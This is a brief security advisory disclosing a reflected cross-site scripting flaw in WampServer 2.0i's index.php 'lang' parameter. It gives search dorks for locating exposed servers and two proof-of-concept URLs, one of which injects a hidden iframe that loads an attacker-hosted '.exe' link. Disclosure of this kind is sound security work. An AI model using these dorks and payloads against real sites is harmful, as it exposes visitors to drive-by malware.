----------------------------------------------------------------

Title: WampServer 2.0i (index.php) Remote Cross Site Scripting Vulnerability


Summary: WampServer - Apache, PHP, MySQL on Windows

Product web page: http://www.wampserver.com

Current version: 2.0i

Vulnerability discovered by Gjoko "LiquidWorm" Krstic

Zero Science Lab - http://www.zeroscience.mk

liquidworm gmail com

26.01.2010

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4926.php

----------------------------------------------------------------

Dork:

	"WampServer - Donate - Anaska"
	"WAMPSERVER Homepage"


PoC:

	http://[site]/index.php?lang=%3Cscript%3Ealert%28%22ZSL%20Testingz%22%29%3C/script%3E
	http://[site]/index.php?lang=%3Ciframe%20height=%220%22%20width=%220%22%20frameborder=%220%22%20src=%22http://[evil .exe link]%22%3E%3C/iframe%3E


//EOF